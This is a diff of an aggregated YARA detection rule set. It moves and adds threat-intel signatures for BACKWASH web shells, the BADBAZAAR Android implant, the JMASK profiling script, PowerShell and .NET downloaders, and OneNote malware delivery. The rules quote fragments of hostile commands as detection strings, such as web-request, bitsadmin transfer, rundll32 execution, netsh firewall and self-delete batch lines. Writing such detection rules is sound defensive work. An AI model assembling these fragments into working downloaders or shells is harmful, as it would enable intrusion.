-		scan_context = "file"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6144
-		version = 4
-
-	strings:
-		$s1 = ".match(/^([3456]\\d{14,15})$/g" ascii
-		$s2 = "^(p(wd|ass(code|wd|word)))" ascii
-		$b1 = "c('686569676874')" ascii
-		$b2 = "c('7769647468')" ascii
-		$c1 = "('696D67')" ascii
-		$c2 = "('737263')" ascii
-		$magic = "d=c.charCodeAt(b),a+=d.toString(16);"
-
-	condition:
-		all of ( $s* ) or all of ( $b* ) or all of ( $c* ) or $magic
-}
-rule VOLEXITY_Malware_Win_Backwash_Iis : WHEELEDASH FILE MEMORY
-{
-	meta:
-		description = "Variant of the BACKWASH malware family with IIS worm functionality."
-		author = "threatintel@volexity.com"
-		id = "08a86a58-32af-5c82-90d2-d6603dae8d63"
-		date = "2020-09-04"
-		modified = "2023-08-17"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2021/2021-12-06 - XEGroup/indicators/yara.yar#L181-L208"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		hash = "98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627"
-		logic_hash = "95a7f9e0afb031b49cd0da66b5a887d26ad2e06cce625bc45739b4a80e96ce9c"
-		score = 75
-		quality = 80
-		tags = "WHEELEDASH, FILE, MEMORY"
-		scan_context = "file,memory"
-		severity = "high"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 231
-		version = 6
-
-	strings:
-		$a1 = "GetShell" ascii
-		$a2 = "smallShell" ascii
-		$a3 = "createSmallShell" ascii
-		$a4 = "getSites" ascii
-		$a5 = "getFiles " ascii
-		$b1 = "action=saveshell&domain=" ascii wide
-		$b2 = "&shell=backsession.aspx" ascii wide
-
-	condition:
-		all of ( $a* ) or any of ( $b* )
-}
 rule VOLEXITY_Apt_Malware_Golang_Govershell_Strings_UTA0388 : UTA0388 FILE MEMORY
 {
 	meta:
@@ -164250,146 +164197,6 @@ rule VOLEXITY_Apt_Malware_Golang_Govershell_Strings_UTA0388 : UTA0388 FILE MEMOR
 	condition:
 		4 of ( $a* ) or 5 of ( $s* ) or 3 of ( $b* )
 }
-rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE
-{
-	meta:
-		description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication."
-		author = "threatintel@volexity.com"
-		id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0"
-		date = "2023-06-01"
-		modified = "2023-06-13"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e"
-		score = 75
-		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405"
-		scan_context = "file"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-
-	strings:
-		$b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b}
-		$s1 = "california1"
-		$s2 = "los1"
-		$s3 = "tech1"
-		$s4 = "common1"
-		$s5 = "common0"
-		$s6 = "220401234506Z"
-		$s7 = "470326234506Z0a1"
-
-	condition:
-		$b1 at 0 or all of ( $s* )
-}
-rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE
-{
-	meta:
-		description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2."
-		author = "threatintel@volexity.com"
-		id = "1f97c610-773f-5385-935a-445cb9192157"
-		date = "2023-05-25"
-		modified = "2023-08-30"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773"
-		score = 75
-		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629"
-		scan_context = "file"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-
-	strings:
-		$c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":["
-		$c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"},"
-		$s1 = "Timezon id:"
-		$s2 = "China Telecom"
-		$s3 = "China Unicom"
-		$s4 = "ConfigPipe"
-		$s5 = "ForwordTo"
-		$s6 = "can't get camera content"
-		$s7 = "cat /sys/class/net/wlan0/address"
-		$s8 = "_preferences_light"
-		$s9 = "registration_jid"
-
-	condition:
-		1 of ( $c* ) or 5 of ( $s* )
-}
-rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE
-{
-	meta:
-		description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset."
-		author = "threatintel@volexity.com"
-		id = "d5d32c8b-53fb-5103-ac73-05f320e71c97"
-		date = "2023-06-27"
-		modified = "2023-09-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146"
-		score = 75
-		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf"
-		scan_context = "file"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-
-	strings:
-		$array_1 = "http://eular.github.io"
-		$array_2 = "stun:stun.services.mozilla.com"
-		$array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask"
-		$array_4 = "/jquery/jquery.min.js"
-		$array_5 = "onicecandidate"
-		$ios_1 = "['a7', '640x1136', [_0x"
-		$ios_2 = "['a7', _0x"
-		$ios_3 = "['a8', _0x"
-		$ios_4 = "['a8', '750x1334', ['iPhone\\x206']]"
-		$ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]"
-		$ios_6 = "['a8', _0x"
-		$ios_7 = "['a9', _0x"
-		$ios_8 = "['a9', '750x1334', [_0x"
-		$ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]"
-		$ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]"
-		$ios_11 = "['a10x', '1668x2224', [_0x"
-		$header = "info = {}, finished = 0x0;"
-
-	condition:
-		3 of ( $array_* ) or 5 of ( $ios_* ) or $header
-}
-rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE
-{
-	meta:
-		description = "Detects the JMASK profiling script in its minified // obfuscated format."
-		author = "threatintel@volexity.com"
-		id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b"
-		date = "2023-06-15"
-		modified = "2023-09-21"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb"
-		score = 75
-		quality = 80
-		tags = "EVILBAMBOO, FILE"
-		hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30"
-		scan_context = "file"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-
-	strings:
-		$rev0 = "oi.buhtig.ralue//:ptth" ascii
-		$rev1 = "lairA' xp41" ascii
-		$rev2 = "dnuof ton ksaMateM" ascii
-		$unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii
-		$unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii
-		$unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii
-		$unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii
-		$header = "(function(){info={};finished=" ascii
-
-	condition:
-		all of ( $rev* ) or all of ( $unicode* ) or $header
-}
 rule VOLEXITY_Apt_Malware_Win_Avburner : DEVIOUSBAMBOO FILE MEMORY
 {
 	meta:
@@ -164619,6 +164426,146 @@ rule VOLEXITY_Informational_Win_3Cx_Msi : UTA0040
 	condition:
 		all of them
 }
+rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE
+{
+	meta:
+		description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication."
+		author = "threatintel@volexity.com"
+		id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0"
+		date = "2023-06-01"
+		modified = "2023-06-13"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e"
+		score = 75
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405"
+		scan_context = "file"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b}
+		$s1 = "california1"
+		$s2 = "los1"
+		$s3 = "tech1"
+		$s4 = "common1"
+		$s5 = "common0"
+		$s6 = "220401234506Z"
+		$s7 = "470326234506Z0a1"
+
+	condition:
+		$b1 at 0 or all of ( $s* )
+}
+rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE
+{
+	meta:
+		description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2."
+		author = "threatintel@volexity.com"
+		id = "1f97c610-773f-5385-935a-445cb9192157"
+		date = "2023-05-25"
+		modified = "2023-08-30"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773"
+		score = 75
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629"
+		scan_context = "file"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":["
+		$c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"},"
+		$s1 = "Timezon id:"
+		$s2 = "China Telecom"
+		$s3 = "China Unicom"
+		$s4 = "ConfigPipe"
+		$s5 = "ForwordTo"
+		$s6 = "can't get camera content"
+		$s7 = "cat /sys/class/net/wlan0/address"
+		$s8 = "_preferences_light"
+		$s9 = "registration_jid"
+
+	condition:
+		1 of ( $c* ) or 5 of ( $s* )
+}
+rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE
+{
+	meta:
+		description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset."
+		author = "threatintel@volexity.com"
+		id = "d5d32c8b-53fb-5103-ac73-05f320e71c97"
+		date = "2023-06-27"
+		modified = "2023-09-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146"
+		score = 75
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf"
+		scan_context = "file"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$array_1 = "http://eular.github.io"
+		$array_2 = "stun:stun.services.mozilla.com"
+		$array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask"
+		$array_4 = "/jquery/jquery.min.js"
+		$array_5 = "onicecandidate"
+		$ios_1 = "['a7', '640x1136', [_0x"
+		$ios_2 = "['a7', _0x"
+		$ios_3 = "['a8', _0x"
+		$ios_4 = "['a8', '750x1334', ['iPhone\\x206']]"
+		$ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]"
+		$ios_6 = "['a8', _0x"
+		$ios_7 = "['a9', _0x"
+		$ios_8 = "['a9', '750x1334', [_0x"
+		$ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]"
+		$ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]"
+		$ios_11 = "['a10x', '1668x2224', [_0x"
+		$header = "info = {}, finished = 0x0;"
+
+	condition:
+		3 of ( $array_* ) or 5 of ( $ios_* ) or $header
+}
+rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE
+{
+	meta:
+		description = "Detects the JMASK profiling script in its minified // obfuscated format."
+		author = "threatintel@volexity.com"
+		id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b"
+		date = "2023-06-15"
+		modified = "2023-09-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb"
+		score = 75
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30"
+		scan_context = "file"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+
+	strings:
+		$rev0 = "oi.buhtig.ralue//:ptth" ascii
+		$rev1 = "lairA' xp41" ascii
+		$rev2 = "dnuof ton ksaMateM" ascii
+		$unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii
+		$unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii
+		$unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii
+		$unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii
+		$header = "(function(){info={};finished=" ascii
+
+	condition:
+		all of ( $rev* ) or all of ( $unicode* ) or $header
+}
 rule VOLEXITY_Apt_Win_Powerstar_Persistence_Batch : CHARMINGKITTEN
 {
 	meta:
@@ -164817,7 +164764,7 @@ rule VOLEXITY_Apt_Win_Powerstar : CHARMINGKITTEN
  * YARA Rule Set
  * Repository Name: JPCERTCC
  * Repository: https://github.com/JPCERTCC/MalConfScan/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 19ec0d145535a6a4cfd37c0960114f455a8c343e
  * Number of Rules: 30
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -165661,7 +165608,7 @@ rule JPCERTCC_Elf_Wellmess : FILE
  * YARA Rule Set
  * Repository Name: SecuInfra
  * Repository: https://github.com/SIFalcon/Detection
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd
  * Number of Rules: 45
  * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
@@ -165671,58 +165618,298 @@ rule JPCERTCC_Elf_Wellmess : FILE
  *
  * NO LICENSE SET
  */
-rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE
+rule SECUINFRA_SUSP_Discord_Attachments_URL : PE DOWNLOAD FILE
 {
 	meta:
-		description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory"
+		description = "Detects a PE file that contains an Discord Attachments URL. This is often used by Malware to download further payloads"
 		author = "SECUINFRA Falcon Team"
-		id = "65aad597-c5fe-50c3-8970-19fb502f1602"
-		date = "2022-02-21"
+		id = "bf81920b-f8ab-594a-aa45-d92446411113"
+		date = "2022-02-19"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L3-L16"
+		license_url = "N/A"
+		logic_hash = "3270b74506e520064361379b274f44a467c55bdcd3d8456967e864526aca8521"
+		score = 65
+		quality = 70
+		tags = "PE, DOWNLOAD, FILE"
+		version = "0.1"
+
+	strings:
+		$url = "cdn.discordapp.com/attachments" nocase wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and $url
+}
+
+rule SECUINFRA_SUSP_DOTNET_PE_Download_To_Specialfolder : DOTNET DOWNLOAD FILE
+{
+	meta:
+		description = "Detects a .NET Binary that downloads further payload and retrieves a special folder"
+		author = "SECUINFRA Falcon Team"
+		id = "106683bf-1d36-58ee-b5af-4723aa70fdad"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L45-L64"
+		license_url = "N/A"
+		logic_hash = "d44c89ab126f79596c8bf3f1327b37a2463faa4e3bb258f9a96d495ac40003f8"
+		score = 65
+		quality = 70
+		tags = "DOTNET, DOWNLOAD, FILE"
+
+	strings:
+		$special_folder = "Environment.SpecialFolder" wide
+		$webclient = "WebClient()" wide
+		$download = ".DownloadFile(" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and $special_folder and $webclient and $download
+}
+
+rule SECUINFRA_SUSP_DOTNET_PE_List_AV : DOTNET AV FILE
+{
+	meta:
+		description = "Detecs .NET Binary that lists installed AVs"
+		author = "SECUINFRA Falcon Team"
+		id = "0f27567a-ab41-5d17-a1d8-a59c9602eb35"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L66-L82"
+		license_url = "N/A"
+		logic_hash = "b82e6ed5740cab26eb3848717204190d61663e7e42ff42536386b00181a15ebb"
+		score = 65
+		quality = 70
+		tags = "DOTNET, AV, FILE"
+
+	strings:
+		$mgt_obj_searcher = "\\root\\SecurityCenter2" wide
+		$query = "Select * from AntivirusProduct" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and pe.imports ( "mscoree.dll" ) and $mgt_obj_searcher and $query
+}
+rule SECUINFRA_SUSP_Netsh_Firewall_Command : PE FILE
+{
+	meta:
+		description = "No description has been set in the source file - SecuInfra"
+		author = "SECUINFRA Falcon Team"
+		id = "c62cbe3f-9585-56c0-bb09-83a36437abda"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/exe.yar#L84-L97"
+		license_url = "N/A"
+		logic_hash = "7d19b433785684ce1d2b008b3fdd36b22c5c82bfec476c787dfa025080b6178d"
+		score = 65
+		quality = 70
+		tags = "PE, FILE"
+
+	strings:
+		$netsh_delete = "netsh firewall delete" wide
+		$netsh_add = "netsh firewall add" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( $netsh_delete or $netsh_add )
+}
+rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD FILE
+{
+	meta:
+		description = "Detect a Download to %temp% and execution with rundll32.exe"
+		author = "SECUINFRA Falcon Team"
+		id = "6b09a6f0-29c6-5baf-ae64-7aa49a37a9d3"
+		date = "2022-09-02"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L1-L17"
+		license_url = "N/A"
+		logic_hash = "4d7860dc94614b10bc0eea0189ad9b964399d4ee6404ebeaef40720c716c592d"
+		score = 65
+		quality = 70
+		tags = "POWERSHELL, DOWNLOAD, FILE"
+
+	strings:
+		$location = "$Env:temp" nocase
+		$download = "downloadfile(" nocase
+		$rundll = "rundll32.exe"
+
+	condition:
+		filesize < 100KB and $location and $download and $rundll
+}
+rule SECUINFRA_SUSP_Powershell_Base64_Decode : POWERSHELL B64 FILE
+{
+	meta:
+		description = "Detects PowerShell code to decode Base64 data. This can yield many FP"
+		author = "SECUINFRA Falcon Team"
+		id = "7cb01c0b-d7e3-5196-b78d-f41765ba0368"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L19-L31"
+		license_url = "N/A"
+		logic_hash = "b323089ac61823d969d04a05890ad9fffe8589165d4b026b08e9fd633d4247de"
+		score = 60
+		quality = 50
+		tags = "POWERSHELL, B64, FILE"
+
+	strings:
+		$b64_decode = "[System.Convert]::FromBase64String("
+
+	condition:
+		filesize < 500KB and $b64_decode
+}
+rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23
+{
+	meta:
+		description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec"
+		date = "2023-02-01"
+		modified = "2023-02-07"
+		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22"
+		license_url = "N/A"
+		logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16"
+		score = 50
+		quality = 30
+		tags = ""
+		tlp = "CLEAR"
+
+	strings:
+		$s_manifest = "AppxManifest.xml"
+		$s_block = "AppxBlockMap.xml"
+		$s_peExt = ".exe"
+		$sig = "AppxSignature.p7x"
+
+	condition:
+		uint16be( 0x0 ) == 0x504B and 2 of ( $s* ) and not $sig
+}
+rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23
+{
+	meta:
+		description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "f24f7e03-3cc5-5214-b6d2-205b69898636"
+		date = "2023-02-01"
+		modified = "2023-02-07"
+		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25"
+		license_url = "N/A"
+		logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa"
+		score = 65
+		quality = 70
+		tags = ""
+		tlp = "CLEAR"
+
+	strings:
+		$xlmns = "http://schemas.microsoft.com/appx/manifest/"
+		$identity = "OID.2.25.311729368913984317654407730594956997722=1"
+		$s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\""
+		$s_capability = "runFullTrust"
+		$s_peExt = ".exe"
+
+	condition:
+		uint32be( 0x0 ) == 0x3C3F786D and $xlmns and $identity and 2 of ( $s* )
+}
+rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23
+{
+	meta:
+		description = "Detects suspicious Microsoft OneNote files used to deliver Malware"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "ebf02a11-6f53-573d-bd7a-9948cef9fb3a"
+		date = "2023-01-19"
+		modified = "2023-01-19"
+		reference = "https://twitter.com/James_inthe_box/status/1615421130877329409"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/MALWARE_OneNote_Delivery_Jan23.yar#L1-L56"
+		license_url = "N/A"
+		logic_hash = "08c38eedf500fd1a0224e396b41aebb8ac82b3705321ca798ac1007ea34366e1"
+		score = 65
+		quality = 66
+		tags = ""
+		tlp = "CLEAR"
+		hash0 = "18af397a27e58afb901c92f37569d48e3372cf073915723e4e73d44537bcf54d"
+		hash1 = "de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf"
+		hash2 = "bfc979c0146d792283f825f99772370f6ff294dfb5b1e056943696aee9bc9f7b"
+		hash3 = "e0d9f2a72d64108a93e0cfd8066c04ed8eabe2ed43b80b3f589b9b21e7f9a488"
+		hash4 = "3f00a56cbf9a0e59309f395a6a0b3457c7675a657b3e091d1a9440bd17963f59"
+
+	strings:
+		$hta = "hta:application" nocase
+		$script1 = "type=\"text/vbscript\""
+		$script2 = "language=\"VBScript\""
+		$powershell = "powershell" nocase
+		$startProc = "Start-Process -Filepath"
+		$webReq = "Invoke-WebRequest -Uri"
+		$bitsadmin = "bitsadmin /transfer"
+		$wscript = "WScript.Shell" nocase
+		$autoOpen = "Sub AutoOpen()"
+		$root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")"
+		$wsfExt = ".wsf" ascii wide
+		$vbsExt = ".vbs" ascii wide
+		$cmd = "cmd /c" nocase
+		$batch = "@echo off"
+		$batExt = ".bat" ascii wide
+		$delExit = "(goto) 2>nul & del \"%~f0\"..exit /b"
+		$dosString = "!This program cannot be run in DOS mode"
+		$exeExt = ".exe" ascii wide
+		$imageFile = "button_click-to-view-document.png" wide
+		$click = "click to view document" nocase wide
+		$path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide
+		$path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide
+		$path3 = "C:\\Users\\julien.galleron\\Downloads" wide
+
+	condition:
+		uint32be( 0x0 ) == 0xE4525C7B and 3 of them
+}
+rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE
+{
+	meta:
+		description = "Detects typical staging directories being referenced inside lnk files"
+		author = "SECUINFRA Falcon Team"
+		id = "459ed2e6-133c-5cde-bf49-95bf8a5eb8c8"
+		date = "2022-02-27"
 		modified = "2022-02-27"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25"
